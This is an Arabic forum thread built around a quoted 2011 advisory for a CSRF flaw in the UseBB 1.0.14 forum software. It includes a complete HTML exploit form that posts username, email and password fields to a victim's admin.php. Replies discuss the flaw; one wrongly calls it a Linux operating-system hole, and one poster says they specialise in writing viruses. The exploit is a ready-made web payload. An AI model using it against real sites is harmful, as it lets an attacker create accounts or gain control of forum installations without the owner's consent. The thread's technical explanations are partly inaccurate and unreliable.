ماذا فهم من هذا واين استغلال الثغرة UseBB 1.0.14 CSRF Vulnerability Author : Muhammet Cagri Tepebasili Date : 11.12.2011 Script & Demo : UseBB http://demo.opensourcecms.com/usebb/index.php Version : 1.0.14 Tested On : Linux Mint 11 Exploit : <label><b>UseBB 1.0.14 CSRF Vulnerability | Author : Muhammet Cagri Tepebasili</b></label><br> <label> Note : Your Password must be min 8 charecter.</label><br> <cagritepebasili> <form action="[Victim]/admin.php" method="post"> <table id="adminregulartable"> <tr><td class="fieldtitle">Username <small>*</small></td><td> <input type="text" size="30" name="name" id="name" maxlength="255" value="" /><div class="moreinfo"> </div></td></tr> <tr><td class="fieldtitle">Email <small>*</small></td><td>< input type="text" size="30" name="email" maxlength="255" value=""/></td></tr> <tr><td class="fieldtitle">Password <small>*</small></td><td><input type="password" size="30" name="passwd1" maxlength="255" /><div class="moreinfo"></div></td></tr> <tr><td class="fieldtitle"> <small>*</small></td><td><input type="password" size="30" name="passwd2" maxlength="255" /></td></tr> <tr><td colspan="2" class="submit"><input type="submit" value="Register" /><input type="reset" value="Reset" /></td></tr></table></form> </cagritepebasili> Greetz : Eymen Sen , Cafer K.Sezer and Baris Turan
السلام عليكم هذه عباره عن ثغره في نظام التشغيل لينكس والي يستخدمووواااا معظم المواقع مع اختلاف اصدارتها ولكن الحاصل انه هذه الثغره في اصدار معين مذكور عند في الاعلى زي كيفيه استغلالها وانا بصراحه تخصص برمجه البرامج بصفه عامه والفيروسات بصفه خاصه اما برمجه نظام تشغيل و استغلال الثغره مو اهتمامي شكراااا على العموم على الثغره وانا متاكد انه كثير استغلالها واحتفظوااا بالمعلومه لنفسهم ما عليه شد حيلك والله يسهلك طريقك
روح فورماتي البسي ديالك لك أكثر أمان وهده الثغرة من صاحب الموقع http://links.aljyyosh.info?http://de...sebb/index.php
لا إله إلا الله محمد رسول الله الله أكبر تحيا الجزائر حرة مستقلة Mohtya
النوع هذا من الثغرات شبيه بال xss الفرق الوحيد ان النوع هذا من الثغرات مايحتاج للضحية انه يضغط على اي رابط بمجرد انه يحمل الصفحة راح يتظبق الامر استغلالها عن ظريق كودات html & javascript هذا والله اعلم
قوانين المنتدى